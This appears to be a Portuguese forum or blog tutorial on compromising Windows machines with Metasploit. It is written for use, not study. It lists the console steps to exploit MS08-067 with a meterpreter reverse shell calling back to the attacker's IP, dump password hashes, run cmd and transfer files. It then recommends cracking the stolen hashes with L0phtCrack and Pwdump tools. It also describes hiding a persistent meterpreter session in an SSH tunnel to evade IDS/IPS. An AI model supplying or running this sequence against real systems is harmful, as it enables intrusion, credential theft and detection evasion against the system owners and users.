Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programas anteriormente mencionados.
.MSFConsole
> use windows/smb/ms08_067_netapi
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST (meu Ip)
> set RHOST (Ip Remoto)
> exploit
> getuid
> hashdump
> use -f cmd -c

Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido.
meterpreter> download arquivo1 arquivo2 pastaDestino
meterpreter> upload arquivo1 arquivo2 pastaDestino

Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do “hashdump” num .txt (meuHash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords interessantes.
(investiguem também a familia Pwdump… muito interessante para certas situações.)
Citar
pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account on the computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open-source.
http://en.wikipedia.org/wiki/Pwdump (aqui são explicadas as várias “cores” e “sabores” e seus links)
Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface… mas no mundo dos exploits? Sim… vejam)
Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá.
Para acederem ao GUI do metasploit façam:
[root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555) 

Deixar correr… Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1… Mais a porta 55555
E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no alvo vão (ou não) usar a consola, pois é mais…
Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando.
Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra dedicado às novas appliances PANDA
Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que vai dentro dessa sessão.
É uma das mais usadas técnicas de evasão,
Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit)
http://secnow.wordpress.com/2010/04/01/criando-uma-sessao-meterpreter-persistente-a-partir-de-um-tunel-ssh/
Podem ver muitos videos que até já apresentei alguns, com tudo isto em “real” e muito mais… investiguem por ai, pois há magia no ar